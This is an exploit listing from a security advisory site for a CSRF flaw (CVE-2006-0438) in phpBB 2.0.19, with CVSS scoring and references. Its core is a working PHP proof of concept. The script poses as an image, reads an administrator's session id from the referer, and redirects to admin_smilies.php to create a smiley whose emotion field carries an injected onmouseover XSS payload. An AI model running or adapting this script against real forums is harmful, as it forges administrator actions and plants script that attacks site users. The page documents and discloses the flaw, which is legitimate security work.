phpBB 2.0.19 CSRF Image

2006.02.08
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

<?php # Maksymilian Arciemowicz # post :x: to see xss OR set request for admin $sid=''; $url = parse_url(getenv('HTTP_REFERER')); preg_match('/(\/.*)\//', $url['path'], $path); preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid); if($sid[1]==""){ $image="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"; header('Content-type: image/gif'); echo base64_decode($image); exit; } else { header("Location: ".$url['scheme']."://".$url['host'].$path[0]."admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c\"%20onmouseover=\"alert('cxsecurity.com')\"%20&sid=".$sid[1]); # REQUEST! } ?>

References:

http://cxsecurity.com/cveshow/CVE-2006-0438/
http://cxsecurity.com/issue/WLB-2006020016


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top